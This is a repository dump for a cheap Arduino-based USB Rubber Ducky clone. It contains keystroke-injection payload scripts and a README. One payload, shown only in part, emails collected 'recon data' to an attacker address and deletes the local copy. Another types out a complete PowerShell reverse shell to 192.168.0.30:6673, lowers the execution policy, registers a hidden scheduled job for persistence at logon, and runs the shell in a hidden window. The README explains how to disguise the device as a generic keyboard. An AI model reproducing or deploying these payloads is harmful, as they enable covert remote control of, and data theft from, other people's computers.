'Password$') 30 | ENTER 31 | STRING $ReportEmail = New-Object System.Net.Mail.MailMessage 32 | ENTER 33 | STRING $ReportEmail.From = 'hacker@googlemail.com' 34 | ENTER 35 | STRING $ReportEmail.To.Add('hacker@googlemail.com') 36 | ENTER 37 | STRING $ReportEmail.Subject = 'Recon Data Test' 38 | ENTER 39 | STRING $ReportEmail.Body = (Get-Content recon_data.txt | out-string) 40 | ENTER 41 | STRING $SMTPInfo.Send($ReportEmail) 42 | ENTER 43 | DELAY 2000 44 | STRING del recon_data.txt 45 | ENTER 46 | STRING exit 47 | ENTER 48 | DELAY 50 49 | STRING exit 50 | ENTER 51 | 52 | 53 | -------------------------------------------------------------------------------- /Examples/textSheel.txt: -------------------------------------------------------------------------------- 1 | REM open notepad and write the PS code to 'psAuxL.ps1' 2 | MAP UK 3 | DELAY 1500 4 | GUI 5 | DELAY 1000 6 | STRING notepad.exe 7 | ENTER 8 | DELAY 2000 9 | STRING param([String]$dest, [Int32]$port); 10 | ENTER 11 | DELAY 50 12 | STRING while (1 -eq 1) { $ErrorActionPreference = 'Continue'; 13 | ENTER 14 | DELAY 50 15 | STRING try {$client = New-Object System.Net.Sockets.TCPClient($dest,$port); 16 | ENTER 17 | STRING $stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0}; 18 | ENTER 19 | STRING $sendbytes = ([text.encoding]::ASCII).GetBytes("Client Connected..."+"`n`n" + "PS " + (pwd).Path + "> "); 20 | ENTER 21 | STRING $stream.Write($sendbytes,0,$sendbytes.Length);$stream.Flush(); 22 | ENTER 23 | STRING while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { 24 | ENTER 25 | STRING $recdata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); 26 | ENTER 27 | STRING if($recdata.StartsWith("kill-link")){ cls; $client.Close(); exit;} try { 28 | ENTER 29 | STRING $sendback = (iex $recdata 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";} 30 | ENTER 31 | STRING catch { $error[0].ToString() + $error[0].InvocationInfo.PositionMessage; 32 | ENTER 33 | STRING 
$sendback2 = "ERROR: " + $error[0].ToString() + "`n`n" + "PS " + (pwd).Path + "> "; cls;} 34 | ENTER 35 | COMD $returnbytes = ([text.encoding]::ASCII).GetBytes($sendback2); 36 | COMD $stream.Write($returnbytes,0,$returnbytes.Length);$stream.Flush(); } } 37 | COMD catch { if($client.Connected) { $client.Close(); } 38 | COMD cls; Start-Sleep -s 30; } } 39 | REM save the file 40 | ALT 41 | DELAY 200 42 | STRING f 43 | DELAY 200 44 | STRING a 45 | DELAY 300 46 | STRING My Documents\psAuxL.ps1 47 | ENTER 48 | DELAY 2000 49 | ALT 50 | DELAY 250 51 | STRING f 52 | DELAY 200 53 | STRING x 54 | DELAY 500 55 | REM open powershell and set the execution policy 56 | GUI 57 | DELAY 1500 58 | STRING powershell.exe 59 | DELAY 800 60 | MENU 61 | DELAY 500 62 | STRING a 63 | ENTER 64 | DELAY 1200 65 | ALT + Y 66 | DELAY 250 67 | ENTER 68 | DELAY 3000 69 | REM first lets set the execution policy if possible 70 | STRING Set-ExecutionPolicy RemoteSigned -Scope CurrentUser 71 | DELAY 50 72 | ENTER 73 | DELAY 750 74 | STRING Y 75 | DELAY 250 76 | ENTER 77 | DELAY 200 78 | STRING $dirx = "C:\Users\" + [Environment]::UserName + "\Documents"; 79 | DELAY 70 80 | ENTER 81 | DELAY 50 82 | STRING $fullpath = $dirx + "\psAuxL.ps1"; 83 | DELAY 70 84 | ENTER 85 | REM finally - attempt to make the shell survive a reboot 86 | STRING $jobtrigger = New-JobTrigger -AtLogon -RandomDelay 00:00:50 87 | DELAY 50 88 | ENTER 89 | DELAY 400 90 | STRING Register-ScheduledJob -Trigger $jobtrigger -Scriptblock{cd $dirx; ./psAuxL.ps1 -dest 192.168.0.30 -port 6673} -Name "NetCheckRun" 91 | DELAY 50 92 | ENTER 93 | DELAY 1200 94 | STRING cd $dirx; 95 | ENTER 96 | DELAY 200 97 | STRING powershell.exe -windowstyle hidden {./psAuxL.ps1 -dest 192.168.0.30 -port 6673} 98 | DELAY 100 99 | ENTER 100 | DELAY 200 101 | STRING exit 102 | ENTER 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | -------------------------------------------------------------------------------- /README.md: 
-------------------------------------------------------------------------------- 1 | # USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle 2 | This project realises a basic version of the 'H4K5' USB Rubber Ducky for under $10 by utilising a $5 CJMCU Beetle board connected to a $5 Arduino compatible microSD card reader module. Only six solder connections are needed. The microSD card carries the encoded keystrokes which are to be sent to the target PC. 3 | A simple Windows application (written in C# - source included) is used to convert a command script text file into the 'script.bin' file executed on the duck. The scripting language is almost 100% compatible with the 'H4K5' devices at $50. 4 | Read the 'Instructions' pdf document for full build and construction details. 5 | 6 | Note: If you want to 'hide' the fact that the ducky clone is an Arduino, it's possible to make changes to some of the Arduino setup files (boards.txt and USBDescriptor.h) such that the USB VID & PID codes can be altered to make the device look like a standard keyboard only, from any manufacturer you wish. 7 | 8 | --------------------------------------------------------------------------------